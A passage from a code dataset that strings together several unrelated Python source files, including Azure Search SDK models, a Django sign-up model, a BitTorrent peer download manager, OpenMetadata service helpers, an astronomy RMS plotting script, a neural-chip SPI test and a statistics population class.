permissions to the Azure Key Vault that is to be used when encrypting your data at rest. The\n Application ID should not be confused with the Object ID for your AAD Application.\n :type application_id: str\n :param application_secret: The authentication key of the specified AAD application.\n :type application_secret: str\n \"\"\"\n\n _validation = {\n 'key_name': {'required': True},\n 'key_version': {'required': True},\n 'vault_uri': {'required': True},\n }\n\n _attribute_map = {\n 'key_name': {'key': 'keyVaultKeyName', 'type': 'str'},\n 'key_version': {'key': 'keyVaultKeyVersion', 'type': 'str'},\n 'vault_uri': {'key': 'keyVaultUri', 'type': 'str'},\n 'application_id': {'key': 'applicationId', 'type': 'str'},\n 'application_secret': {'key': 'applicationSecret', 'type': 'str'},\n }\n\n def __init__(\n self,\n **kwargs\n ):\n super(SearchResourceEncryptionKey, self).__init__(**kwargs)\n self.key_name = kwargs['key_name']\n self.key_version = kwargs['key_version']\n self.vault_uri = kwargs['vault_uri']\n self.application_id = kwargs.get('application_id', None)\n self.application_secret = kwargs.get('application_secret', None)\n\n\nclass SynonymMap(msrest.serialization.Model):\n \"\"\"Represents a synonym map definition.\n\n Variables are only populated by the server, and will be ignored when sending a request.\n\n All required parameters must be populated in order to send to Azure.\n\n :param name: Required. The name of the synonym map.\n :type name: str\n :ivar format: Required. The format of the synonym map. Only the 'solr' format is currently\n supported. Default value: \"solr\".\n :vartype format: str\n :param synonyms: Required. A series of synonym rules in the specified synonym map format. 
The\n rules must be separated by newlines.\n :type synonyms: str\n :param encryption_key: A description of an encryption key that you create in Azure Key Vault.\n This key is used to provide an additional level of encryption-at-rest for your data when you\n want full assurance that no one, not even Microsoft, can decrypt your data in Azure Cognitive\n Search. Once you have encrypted your data, it will always remain encrypted. Azure Cognitive\n Search will ignore attempts to set this property to null. You can change this property as\n needed if you want to rotate your encryption key; Your data will be unaffected. Encryption with\n customer-managed keys is not available for free search services, and is only available for paid\n services created on or after January 1, 2019.\n :type encryption_key: ~azure.search.documents.models.SearchResourceEncryptionKey\n :param e_tag: The ETag of the synonym map.\n :type e_tag: str\n \"\"\"\n\n _validation = {\n 'name': {'required': True},\n 'format': {'required': True, 'constant': True},\n 'synonyms': {'required': True},\n }\n\n _attribute_map = {\n 'name': {'key': 'name', 'type': 'str'},\n 'format': {'key': 'format', 'type': 'str'},\n 'synonyms': {'key': 'synonyms', 'type': '[str]'},\n 'encryption_key': {'key': 'encryptionKey', 'type': 'SearchResourceEncryptionKey'},\n 'e_tag': {'key': '@odata\\\\.etag', 'type': 'str'},\n }\n\n format = \"solr\"\n\n def __init__(\n self,\n **kwargs\n ):\n super(SynonymMap, self).__init__(**kwargs)\n self.name = kwargs['name']\n self.synonyms = kwargs['synonyms']\n self.encryption_key = kwargs.get('encryption_key', None)\n self.e_tag = kwargs.get('e_tag', None)\n\n\nclass SearchIndexerDataSourceConnection(msrest.serialization.Model):\n \"\"\"Represents a datasource connection definition, which can be used to configure an indexer.\n\n All required parameters must be populated in order to send to Azure.\n\n :param name: Required. The name of the datasource connection.\n :type name: str\n :param description: The description of the datasource connection.\n :type description: str\n :param type: Required. The type of the datasource connection. Possible values include: \"azuresql\",\n \"cosmosdb\", \"azureblob\", \"azuretable\", \"mysql\".\n :type type: str or ~azure.search.documents.models.SearchIndexerDataSourceType\n :param connection_string: The connection string for the datasource connection.\n :type connection_string: str\n :param container: Required. 
The data container for the datasource connection.\n :type container: ~azure.search.documents.models.SearchIndexerDataContainer\n :param data_change_detection_policy: The data change detection policy for the datasource connection.\n :type data_change_detection_policy: ~azure.search.documents.models.DataChangeDetectionPolicy\n :param data_deletion_detection_policy: The data deletion detection policy for the datasource connection.\n :type data_deletion_detection_policy:\n ~azure.search.documents.models.DataDeletionDetectionPolicy\n :param e_tag: The ETag of the data source.\n :type e_tag: str\n \"\"\"\n\n _validation = {\n 'name': {'required': True},\n 'type': {'required': True},\n 'connection_string': {'required': True},\n 'container': {'required': True},\n }\n\n _attribute_map = {\n 'name': {'key': 'name', 'type': 'str'},\n 'description': {'key': 'description', 'type': 'str'},\n 'type': {'key': 'type', 'type': 'str'},\n 'connection_string': {'key': 'connectionString', 'type': 'str'},\n 'container': {'key': 'container', 'type': 'SearchIndexerDataContainer'},\n 'data_change_detection_policy': {'key': 'dataChangeDetectionPolicy', 'type': 'DataChangeDetectionPolicy'},\n 'data_deletion_detection_policy': {'key': 'dataDeletionDetectionPolicy', 'type': 'DataDeletionDetectionPolicy'},\n 'e_tag': {'key': '@odata\\\\.etag', 'type': 'str'},\n }\n\n def __init__(\n self,\n **kwargs\n ):\n super(SearchIndexerDataSourceConnection, self).__init__(**kwargs)\n self.name = kwargs['name']\n self.description = kwargs.get('description', None)\n self.type = kwargs['type']\n self.connection_string = kwargs['connection_string']\n self.container = kwargs['container']\n self.data_change_detection_policy = kwargs.get('data_change_detection_policy', None)\n self.data_deletion_detection_policy = kwargs.get('data_deletion_detection_policy', None)\n self.e_tag = kwargs.get('e_tag', None)\n","sub_path":"sdk/search/azure-search-documents/azure/search/documents/indexes/_internal/_models.py","file_name":"_models.py","file_ext":"py","file_size_in_byte":11781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"429286814","text":"from django.db import models\n\n# special characters for foreign languages (ex. 
accents)\nfrom django.utils.encoding import smart_unicode\n\n# Create your models here.\n\nclass SignUp(models.Model):\n # basic user information\n first_name = models.CharField(max_length=120, null=True, blank=True)\n last_name = models.CharField(max_length=120, null=True, blank=True)\n email = models.EmailField(null=True, blank=True)\n \n # auto_now_add: when created make timestamp\n # auto_now: when updated or changed, make a note of that timestamp\n timestamp = models.DateTimeField(auto_now_add=True, auto_now=False)\n updated = models.DateTimeField(auto_now_add=False, auto_now=True)\n \n # status\n diamond = 'd';\n platinum = 'p';\n gold = 'g';\n silver = 's';\n bronze = 'b';\n \n status_choices = (\n (bronze, 'Bronze'),\n (silver, 'Silver'),\n (gold, 'Gold'),\n (platinum, 'Platinum'),\n (diamond, 'Diamond'),\n )\n \n status = models.CharField(max_length=1,\n choices=status_choices,\n default=bronze);\n \n def __unicode__(self):\n return smart_unicode(self.email)","sub_path":"Prototype/src/signups/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"297518287","text":"from MediaPlayer.Torrents.Peer.PeerMessages import RequestMessage\nfrom MediaPlayer.Util.Enums import PeerInterestedState, PeerChokeState, PeerState, PeerSpeed\nfrom Shared.LogObject import LogObject\nfrom Shared.Logger import Logger, LogVerbosity\nfrom Shared.Settings import Settings\nfrom Shared.Util import current_time\n\n\nclass PeerDownloadManager(LogObject):\n @property\n def max_blocks(self):\n if self.peer.peer_speed != PeerSpeed.Low:\n self.peer.max_blocks_log = self._fast_peer_max_blocks\n return self._fast_peer_max_blocks\n self.peer.max_blocks_log = self._low_peer_max_blocks\n return self._low_peer_max_blocks\n\n def __init__(self, peer):\n super().__init__(peer, \"download\")\n\n self.peer = peer\n self.stopped = False\n self.downloading = []\n\n self._block_size = Settings.get_int(\"block_size\")\n self._low_peer_max_blocks = Settings.get_int(\"low_peer_max_download_buffer\") // self._block_size\n self._medium_peer_max_blocks = Settings.get_int(\"medium_peer_max_download_buffer\") // self._block_size\n self._fast_peer_max_blocks = Settings.get_int(\"fast_peer_max_download_buffer\") // self._block_size\n\n self.timed_out_blocks = 0\n\n # Logging props\n self.downloading_log = \"\"\n\n def update_requests(self):\n if self.peer.state != PeerState.Started:\n return True\n\n if self.peer.communication_state.out_interest == PeerInterestedState.Uninterested:\n return True\n\n if len(self.downloading) >= self.max_blocks:\n return True\n\n if self.peer.communication_state.in_choke == PeerChokeState.Choked:\n #if len(self.peer.allowed_fast_pieces) == 0:\n return True\n\n # with self.lock:\n # new_blocks = self.max_blocks - len(self.downloading)\n # to_download = self.peer.torrent.download_manager.get_allowed_fast_blocks_to_download(self.peer, new_blocks)\n # for block in to_download:\n # self.downloading.append((block, current_time()))\n #\n # if len(to_download) == 0:\n # return True\n #\n # Logger().write(LogVerbosity.Debug, str(self.peer.id) + \" requesting \" + str(len(to_download)) + \" allowed fast blocks\")\n # self.request(to_download)\n # return True\n\n if current_time() - self.timed_out_blocks < 10000:\n # We have timed out on block we previously requested, don't request new for some time\n return True\n\n new_blocks = self.max_blocks - len(self.downloading)\n to_download = 
self.peer.torrent.download_manager.get_blocks_to_download(self.peer, new_blocks)\n self.request(to_download)\n return True\n\n def request(self, to_download):\n download_count = len(to_download)\n if download_count > 0:\n Logger().write(LogVerbosity.Debug, str(self.peer.id) + \" going to request \" + str(len(to_download)) + \" blocks. Now \" + str(len(self.downloading)))\n self.peer.protocol_logger.update(\"Sending/receiving requests\", True)\n self.downloading += [(block, current_time(), False) for block in to_download]\n for block in to_download:\n block.add_downloader(self.peer)\n request = RequestMessage(block.piece_index, block.start_byte_in_piece, block.length)\n Logger().write(LogVerbosity.All, str(self.peer.id) + ' Sending request for piece ' + str(request.index) + \", block \" + str(\n request.offset // 16384))\n self.peer.connection_manager.send(request.to_bytes())\n self.downloading_log = \", \".join([str(x[0].index) for x in self.downloading])\n\n def block_done(self, block_offset, timestamp):\n downloading_block = [(block, request_time, timed_out) for block, request_time, timed_out in self.downloading if block.start_byte_total == block_offset]\n if len(downloading_block) == 0:\n return # Not currently registered as downloading\n\n downloading_block = downloading_block[0]\n round_trip_time = timestamp - downloading_block[1]\n self.peer.adjust_round_trip_time(round_trip_time)\n self.downloading.remove(downloading_block)\n self.downloading_log = \", \".join([str(x[0].index) for x in self.downloading])\n downloading_block[0].remove_downloader(self.peer)\n\n def update_timeout(self):\n if self.peer is None or self.peer.state != PeerState.Started:\n return True\n\n canceled = 0\n\n timed_out_blocks = [(block, request_time, timed_out) for block, request_time, timed_out in self.downloading\n if current_time() - request_time > self.get_priority_timeout(self.peer.torrent.data_manager._pieces[block.piece_index].priority) and not timed_out]\n\n for block_request in timed_out_blocks:\n block = block_request[0]\n self.downloading.remove(block_request)\n self.downloading.append((block_request[0], block_request[1], True))\n self.downloading_log = \", \".join([str(x[0].index) for x in self.downloading])\n\n # cancel_msg = CancelMessage(block.piece_index, block.start_byte_in_piece, block.length)\n # self.peer.protocol_logger.update(\"Sending cancel (timeout)\")\n # Logger().write(LogVerbosity.All, str(self.peer.id) + ' Sending cancel for piece ' + str(block.piece_index) + \", block \" + str(cancel_msg.offset // 16384))\n # self.peer.connection_manager.send(cancel_msg.to_bytes())\n\n block.remove_downloader(self.peer)\n canceled += 1\n\n if canceled:\n Logger().write(LogVerbosity.Debug, str(self.peer.id) + \" canceled \" + str(canceled) + \" blocks\")\n self.timed_out_blocks = current_time()\n\n @staticmethod\n def get_priority_timeout(priority):\n if priority >= 100:\n return 5000\n if priority >= 95:\n return 15000\n return 9999999999\n\n def has_interesting_pieces(self):\n if self.peer.bitfield is None or self.peer.bitfield.has_none:\n return False\n\n interesting_pieces = self.peer.torrent.data_manager.get_interesting_pieces()\n return self.peer.torrent.data_manager.bitfield.interested_in(self.peer.bitfield, interesting_pieces)\n\n def request_rejected(self, piece_index, offset, length):\n peer_download = [x for x in self.downloading if x[0].piece_index == piece_index and x[0].start_byte_in_piece == offset]\n if len(peer_download) != 0:\n peer_download[0][0].remove_downloader(self.peer)\n 
Logger().write(LogVerbosity.Debug, \"Removed a rejected request from peer download manager\")\n self.downloading.remove(peer_download[0])\n self.downloading_log = \", \".join([str(x[0].index) for x in self.downloading])\n self.timed_out_blocks = current_time()\n\n def stop(self):\n self.stopped = True\n for block, request_time, timed_out in self.downloading:\n block.remove_downloader(self.peer)\n self.downloading.clear()\n self.downloading_log = \"\"\n self.peer = None\n\n","sub_path":"src/MediaPlayer/Torrents/Peer/PeerDownloadManager.py","file_name":"PeerDownloadManager.py","file_ext":"py","file_size_in_byte":7211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"315778108","text":"# Licensed to the Apache Software Foundation (ASF) under one or more\n# contributor license agreements. See the NOTICE file distributed with\n# this work for additional information regarding copyright ownership.\n# The ASF licenses this file to You under the Apache License, Version 2.0\n# (the \"License\"); you may not use this file except in compliance with\n# the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\nfrom datetime import datetime, timedelta\nfrom typing import List\n\nfrom metadata.generated.schema.api.services.createDashboardService import (\n CreateDashboardServiceEntityRequest,\n)\nfrom metadata.generated.schema.api.services.createDatabaseService import (\n CreateDatabaseServiceEntityRequest,\n)\nfrom metadata.generated.schema.api.services.createMessagingService import (\n CreateMessagingServiceEntityRequest,\n)\nfrom metadata.generated.schema.entity.services.dashboardService import DashboardService\nfrom metadata.generated.schema.entity.services.databaseService import DatabaseService\nfrom metadata.generated.schema.entity.services.messagingService import MessagingService\nfrom metadata.ingestion.ometa.ometa_api import OpenMetadata\n\n\ndef get_start_and_end(duration):\n today = datetime.utcnow()\n start = (today + timedelta(0 - duration)).replace(\n hour=0, minute=0, second=0, microsecond=0\n )\n end = (today + timedelta(3)).replace(hour=0, minute=0, second=0, microsecond=0)\n return start, end\n\n\ndef snake_to_camel(s):\n a = s.split(\"_\")\n a[0] = a[0].capitalize()\n if len(a) > 1:\n a[1:] = [u.title() for u in a[1:]]\n return \"\".join(a)\n\n\ndef get_database_service_or_create(config, metadata_config) -> DatabaseService:\n metadata = OpenMetadata(metadata_config)\n service = metadata.get_by_name(entity=DatabaseService, fqdn=config.service_name)\n if service is not None:\n return service\n else:\n service = {\n \"jdbc\": {\n \"connectionUrl\": f\"jdbc://{config.host_port}\",\n \"driverClass\": \"jdbc\",\n },\n \"name\": config.service_name,\n \"description\": \"\",\n \"serviceType\": config.get_service_type(),\n }\n created_service = metadata.create_or_update(\n CreateDatabaseServiceEntityRequest(**service)\n )\n return created_service\n\n\ndef get_messaging_service_or_create(\n service_name: str,\n message_service_type: str,\n schema_registry_url: str,\n brokers: List[str],\n metadata_config,\n) -> MessagingService:\n metadata = OpenMetadata(metadata_config)\n 
service = metadata.get_by_name(entity=MessagingService, fqdn=service_name)\n if service is not None:\n return service\n else:\n created_service = metadata.create_or_update(\n CreateMessagingServiceEntityRequest(\n name=service_name,\n serviceType=message_service_type,\n brokers=brokers,\n schemaRegistry=schema_registry_url,\n )\n )\n return created_service\n\n\ndef get_dashboard_service_or_create(\n service_name: str,\n dashboard_service_type: str,\n username: str,\n password: str,\n dashboard_url: str,\n metadata_config,\n) -> DashboardService:\n metadata = OpenMetadata(metadata_config)\n service = metadata.get_by_name(entity=DashboardService, fqdn=service_name)\n if service is not None:\n return service\n else:\n created_service = metadata.create_or_update(\n CreateDashboardServiceEntityRequest(\n name=service_name,\n serviceType=dashboard_service_type,\n username=username,\n password=password,\n dashboardUrl=dashboard_url,\n )\n )\n return created_service\n\n\ndef convert_epoch_to_iso(seconds_since_epoch):\n dt = datetime.utcfromtimestamp(seconds_since_epoch)\n iso_format = dt.isoformat() + \"Z\"\n return iso_format\n","sub_path":"ingestion/src/metadata/utils/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":4303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"469854105","text":"from sys import argv\nfrom os import path\nimport numpy as np\nfrom pyDANDIA import hd5_utils\nfrom pyDANDIA import logs\nfrom pyDANDIA import metadata\nfrom pyDANDIA import pipeline_setup\nfrom pyDANDIA import normalize_photometry\nfrom pyDANDIA import crossmatch\nfrom pyDANDIA import field_photometry\nfrom pyDANDIA import plot_rms\nfrom pyDANDIA import plotly_lightcurves\nimport matplotlib as mpl\nmpl.use('Agg')\nimport matplotlib.pyplot as plt\n\ndef calc_field_rms():\n\n params = get_args()\n\n log = logs.start_stage_log( params['red_dir'], 'field_rms' )\n\n # Crossmatch table provides information on the filter used for each image\n xmatch = crossmatch.CrossMatchTable()\n xmatch.load(params['crossmatch_file'],log=log)\n log.info('Loaded crossmatch table for the field')\n\n filter_list = np.unique(xmatch.images['filter'].data)\n log.info('Identified list of filters to process: '+repr(filter_list))\n\n log.info('Loading the timeseries photometry...')\n phot_data = hd5_utils.read_phot_from_hd5_file(params['phot_file'], return_type='array')\n log.info('-> Completed photometry load')\n\n # By default, select the columns of photometry that have been normalized:\n (mag_col, mag_err_col) = field_photometry.get_field_photometry_columns('normalized')\n qc_col = 16\n\n # Plot a separate RMS diagram for each filter\n for filter in filter_list:\n image_index = np.where(xmatch.images['filter'] == filter)[0]\n phot_data_filter = phot_data[:,image_index,:]\n jdx = np.where(xmatch.field_index['quadrant'] == float(int(params['quadrant'])))[0]\n log.info(str(len(jdx))+' stars in quadrant '+params['quadrant'])\n\n # Calculate lightcurve statistics, filtering out any with zero measurements:\n phot_statistics = np.zeros( (len(phot_data_filter),3) )\n\n phot_statistics[:,0] = xmatch.stars['field_id'][jdx]\n (phot_statistics[:,1],werror) = plot_rms.calc_weighted_mean_2D(phot_data_filter, mag_col, mag_err_col, qc_col=qc_col)\n phot_statistics[:,2] = plot_rms.calc_weighted_rms(phot_data_filter, phot_statistics[:,1], mag_col, mag_err_col, qc_col=qc_col)\n\n selection = np.logical_and(phot_statistics[:,1] > 0.0, phot_statistics[:,2] > 0.0)\n phot_statistics 
= phot_statistics[selection]\n\n # Plot interactive RMS diagram\n plot_file = path.join(params['red_dir'], params['plot_file_root']+'_'+filter+'.html')\n axis_labels = ['Mag', 'RMS [mag]']\n target_params = {}\n plot_title = 'RMS diagram for '+params['field_name']+', quadrant '\\\n +params['quadrant']+', '+filter+'-band'\n plotly_lightcurves.plot_interactive(phot_statistics, plot_file, axis_labels,\n target_params, title=plot_title, logy=True, xreverse=True)\n\n logs.close_log(log)\n\ndef get_args():\n\n params = {}\n\n if len(argv) == 1:\n\n params['red_dir'] = input('Please enter the path to the top-level data directory: ')\n params['field_name'] = input('Please enter the name of the field: ')\n params['quadrant'] = input('Please enter the index number of the quadrant to analyse: ')\n\n else:\n\n params['red_dir'] = argv[1]\n params['field_name'] = argv[2]\n params['quadrant'] = argv[3]\n\n params['crossmatch_file'] = path.join(params['red_dir'],\n params['field_name']+'_field_crossmatch.fits')\n params['phot_file'] = path.join(params['red_dir'],\n params['field_name']+'_quad'+params['quadrant']\n +'_photometry.hdf5')\n params['plot_file_root'] = params['field_name']+'_quad'+params['quadrant'] \\\n +'_rms_postnorm'\n\n return params\n\n\nif __name__ == '__main__':\n calc_field_rms()\n","sub_path":"pyDANDIA/plot_field_rms.py","file_name":"plot_field_rms.py","file_ext":"py","file_size_in_byte":3768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"626957075","text":"##\n## Test SPI\n##\n## Series of SPI access to the Braincard including\n## single and multiple Read/Write commands\n##\n## Adjust the clock speed settings if necessary for stability\n##\nimport time\n\nimport Braincard\nfrom constants import *\n\nBraincard.connect(500000);\n\nBraincard.write(CM1K,FORGET,0);\n\nvalue1= 1;\nvalue2= 4096;\nvalue3=10;\nlength=10;\niteration=0;\nerror=0;\n\n#while True:\nwhile iteration<20:\n error=0;\n \n ## Single write to the MINIF and MAXIF registers\n value=Braincard.write(CM1K,MINIF, value1);\n value=Braincard.write(CM1K,MAXIF, value2);\n\n ## Multiple write to the COMP register\n ## after setting the neurons in save and restore mode\n Braincard.write(CM1K, NSR,16);\n Braincard.write(CM1K, RESETCHAIN,0);\n data=[0 for i in range(0,length)]\n for i in range(0,length):\n data[i]=value3+i;\n Braincard.writeAddr(0x01000001, length, data);\n Braincard.read(CM1K, CAT) ##to move to next neuron in the chain\n Braincard.write(CM1K, NSR,0); ##set CM1K in normal mode\n\n ## Single read to the MINIF and MAXIF registers\n ## and verification of the expected value\n value=Braincard.read(CM1K,MINIF);\n if (value!=value1):\n error=1;\n print(\"ERROR, incorrect Minif=%u\" % value);\n \n value=Braincard.read(CM1K,MAXIF);\n if (value!=value2):\n error=2;\n print(\"ERROR2, incorrect Maxif=%u\" % value);\n\n ## Multiple write to the COMP register\n ## after setting the neurons in save and restore mode\n Braincard.write(CM1K, NSR,16); ##set CM1K in save and restore mode\n Braincard.write(CM1K, RESETCHAIN,0);\n data=Braincard.readAddr(0x01000001, length);\n for i in range(0,length):\n if(data[i]!= value3+i):\n error=3;\n print(\"ERROR3, incorrect COMP %u = %u\" % (i, data[i]));\n Braincard.read(CM1K, CAT) ##to move to next neuron in the chain\n Braincard.write(CM1K, NSR,0); ##set CM1K in normal mode\n\n if (error==0):\n print (\"\\nIteration= %u, Pass\" % iteration);\n\n iteration=iteration+1; \n value1=value1+1;\n if (value1==256):\n value1=0\n 
value2=value2-1;\n if (value2==0):\n value2=4096;\n value3=value3+1;\n if (value3==256):\n value3=0;\n\n\n","sub_path":"braincard/Test_SPIcomm.py","file_name":"Test_SPIcomm.py","file_ext":"py","file_size_in_byte":2221,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"608180774","text":"import uuid\nimport pytz\nfrom collections import defaultdict\nfrom sqlalchemy.inspection import inspect\nfrom flask_sqlalchemy import before_models_committed, models_committed\n\nfrom api import db, after_app_created\n\n__author__ = 'Kostel Serhii'\n\n\ndef _first_level_dict(obj, data):\n if not data:\n return dict()\n return dict((key, value) for key, value in data.items() if hasattr(obj, key) and not isinstance(value, dict))\n\n\nclass BaseModel(db.Model):\n \"\"\" Base model for all models \"\"\"\n\n __abstract__ = True\n\n @classmethod\n def get_pk_field_name(cls):\n \"\"\"\n Get primary key from model.\n Work ONLY with single primary key!, else raise exception.\n :return: primary key field name\n \"\"\"\n primary_key_fields = inspect(cls).primary_key\n if len(primary_key_fields) == 0:\n raise AttributeError('Primary key field not fount')\n if len(primary_key_fields) > 1:\n raise AttributeError('Got more than one primary key')\n\n return primary_key_fields[0].name\n\n @classmethod\n def unique(cls, field_name, checked_value):\n \"\"\"\n Check is field unique or not.\n :param field_name: name of the model field to check\n :param checked_value: value to check for unique\n :return: is checked_value unique for field with field_name for current model\n :raise Error: if field with field_name not found in current model\n \"\"\"\n return cls.query.filter_by(**{field_name: checked_value}).count() == 0\n\n @classmethod\n def exists(cls, primary_key):\n \"\"\"\n Check is row with primary key exists.\n Work ONLY with single field primary key, else raise exception.\n :param primary_key: checked primary key value\n :return: boolean value exists or not (True/False)\n \"\"\"\n pk_field_name = cls.get_pk_field_name()\n return not cls.unique(pk_field_name, primary_key)\n\n @classmethod\n def create(cls, data, add_to_db=True):\n \"\"\"\n Create new model on the base of data dict.\n :param data: dict with created fields and values\n :param add_to_db: add updated model to db session or not\n :return: new model instance\n \"\"\"\n data = _first_level_dict(cls, data)\n model = cls(**data)\n if data and add_to_db:\n db.session.add(model)\n return model\n\n def update(self, data, add_to_db=True):\n \"\"\"\n Update model from data dict\n :param data: dict with undated fields and values\n :param add_to_db: add updated model to db session or not\n \"\"\"\n data = _first_level_dict(self, data)\n for key, value in data.items():\n setattr(self, key, value)\n if data and add_to_db:\n db.session.add(self)\n\n\nclass _EventHandler:\n \"\"\"\n Class that handel sqlalchemy events.\n \"\"\"\n _subscribers_store_mapper = {\n 'before': defaultdict(list),\n 'after': defaultdict(list)\n }\n\n @classmethod\n def _committed(cls, changes, subscribers_store):\n for model_instance, operation in changes:\n subscribers = subscribers_store.get((model_instance.__class__.__name__, operation))\n if subscribers is not None:\n for subscribe_func in subscribers:\n subscribe_func(model_instance)\n\n @classmethod\n def before_committed(cls, sender, changes):\n cls._committed(changes, cls._subscribers_store_mapper.get('before'))\n\n @classmethod\n def after_committed(cls, sender, changes):\n 
cls._committed(changes, cls._subscribers_store_mapper.get('after'))\n\n @classmethod\n def register(cls, model_class, event_type, subscribe_func):\n committed_status, _, operation = event_type.partition('_')\n subscribers_store = cls._subscribers_store_mapper.get(committed_status)\n if subscribers_store is not None:\n subscribers_store[(model_class.__name__, operation)].append(subscribe_func)\n\n\n@after_app_created\ndef register_connection(app):\n before_models_committed.connect(_EventHandler.before_committed, sender=app)\n models_committed.connect(_EventHandler.after_committed, sender=app)\n\n\ndef on_model_event(model_class, event_type):\n \"\"\"\n On database event decorator.\n Subscribe function with database model class to specified event.\n Parameter \"event_type\" is combination of before/after prefix\n and insert/update/delete suffix connect by \"_\" symbol.\n Prefix:\n - before - before_commit\n - after - after_commit\n Suffix:\n - insert - create model\n - update - update model\n - delete - delete model\n\n :param object model_class: database class model\n :param str event_type: event type (e.g. before_insert, after_delete)\n \"\"\"\n def register_event_subscribe_func(func):\n _EventHandler.register(model_class, event_type, func)\n return func\n return register_event_subscribe_func\n\n\n# functions for fields default\n\ndef uuid_id():\n return str(uuid.uuid4())\n\n# use only as server_default=base.now_dt or onupdate=base.now_dt\nnow_dt = db.func.now(tz=pytz.utc)\n","sub_path":"api/models/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":5138,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"640873892","text":"\"\"\" Functional testing for API - stations using wf1 \"\"\"\nfrom pytest_bdd import scenario, given, then\nfrom fastapi.testclient import TestClient\nfrom aiohttp import ClientSession\nfrom app.main import app\nfrom app.tests.common import default_mock_client_get\n\n\n@scenario('test_stations.feature', 'Get weather stations from WFWX',\n example_converters=dict(status=int, index=int, code=int, name=str, lat=float,\n long=float, ecodivision_name=str, core_season=dict))\ndef test_stations_scenario():\n \"\"\" BDD Scenario. \"\"\"\n\n\n# pylint: disable=unused-argument\n@given(\"I request a list of weather stations\")\ndef response(monkeypatch, mock_env_with_use_wfwx):\n \"\"\" Mock external requests and make GET /stations/ request \"\"\"\n monkeypatch.setattr(ClientSession, 'get', default_mock_client_get)\n\n client = TestClient(app)\n return client.get('/stations/')\n\n\n# pylint: disable=unused-argument, redefined-outer-name, too-many-arguments\n@then(\"the response status code is <status>\")\ndef status_code(response, status: int):\n \"\"\" Assert that we receive the expected status code \"\"\"\n assert response.status_code == status\n\n\n@then(\"there are active 16 weather stations\")\ndef active_16_weather_stations(response):\n \"\"\" We expect there to be 16 weather stations. Even though we were given 50 stations from the\n API, some of those stations are inactive/invalid/disabled or don't have lat/long.\n \"\"\"\n assert len(response.json()['weather_stations']) == 16\n\n\n@then(\"there is a station in <index> has <code>, <name>, <lat> and <long>\")\ndef there_is_a_station(response, index, code, name, lat, long):\n \"\"\" We expect a station to have a code, name, lat and long. 
\"\"\"\n assert (response.json()['weather_stations'][index]['code'] == code and\n response.json()['weather_stations'][index]['name'] == name and\n response.json()['weather_stations'][index]['lat'] == lat and\n response.json()['weather_stations'][index]['long'] == long)\n\n\n@then(\"the station has <ecodivision_name> with core_season <start_month> <start_day> - <end_month> <end_day>\")\ndef station_ecodivision_data(response, index, ecodivision_name, start_month, start_day, end_month, end_day):\n \"\"\" We expect station's ecodivision to have name, start_month start_day - end_month end_day \"\"\"\n assert (response.json()['weather_stations'][index]['ecodivision_name'] == ecodivision_name and\n response.json()['weather_stations'][index]['core_season'] == {\n \"start_month\": int(start_month),\n \"start_day\": int(start_day),\n \"end_month\": int(end_month),\n \"end_day\": int(end_day)})\n","sub_path":"app/tests/test_stations.py","file_name":"test_stations.py","file_ext":"py","file_size_in_byte":2683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"218971769","text":"import pandas as pd\nimport numpy as np\nimport random\nimport matplotlib.pyplot\n\n\nclass Population:\n #initialize a random population of n entires between minNum and maxNum\n def __init__(self, minNum, maxNum, n):\n self.min= minNum\n self.max = maxNum\n self.n = n\n \n self.pop = []\n for x in range(n):\n self.pop.append(random.randint(self.min,self.max))\n \n self.pop_mean = np.mean(self.pop)\n self.pop_stdev = np.std(self.pop)\n self.pop_var = np.var(self.pop)\n self.pop_n = len(self.pop)\n \n #sets up the histogram plot based on if an arguement was passed or not\n def plot_population(self, data = []):\n #if no data is passed in, then self.pop aka the population that is made when the class is initialized is plotted. 
If some data is passed in, then that data is plotted\n if data == []:\n data = self.pop\n self.__hist__(data)\n \n #plots histogram\n def __hist__(self, data):\n fig = matplotlib.pyplot.figure()\n matplotlib.pyplot.hist(data, bins=101, density=False)\n fig.suptitle('Frequency', fontsize=15)\n matplotlib.pyplot.xlabel(\"Number\")\n matplotlib.pyplot.ylabel(\"Frequency\")\n #matplotlib.pyplot.xlim(0,100)\n matplotlib.pyplot.show()\n \n #prints population parameters\n def get_statistics(self):\n print(f\"Population n = {self.pop_n}\")\n print(f\"Population Mean = {self.pop_mean}\")\n print(f\"Population Variance = {self.pop_var}\")\n print(f\"Population Standard Deviation = {self.pop_stdev}\")\n \n #randomly picks sample, returns sample data\n def get_sample(self, sample_size=30):\n sample = random.sample(self.pop, sample_size)\n return {\n \"n\":len(sample),\n \"mean\":np.mean(sample),\n \"bi-var\":np.var(sample),\n \"unbi-var\":np.var(sample, ddof=1),\n \"stdev\":np.std(sample, ddof = 1),\n \"sample\":sample\n }\n \n #picks n number of samples and reeturns a list of all of their means\n def get_sampling_distribution(self, n, sample_size =30):\n sample_mean_list = []\n for i in range(n):\n sample_mean_list.append(self.get_sample(sample_size)[\"mean\"])\n return sample_mean_list\n \n\nclass NormalPopulation(Population):\n \n def __init__(self, mean, stdev, n):\n self.mean = mean\n self.stdev = stdev\n self.n = n\n \n self.pop = np.random.normal(self.mean,self.stdev,self.n).tolist()\n self.pop_mean = np.mean(self.pop)\n self.pop_stdev = np.std(self.pop)\n self.pop_var = np.var(self.pop)\n self.pop_n = len(self.pop)\n\n def get_samples_mean_variances(self, num_samples_max, sample_size=30):\n aggregate_df = 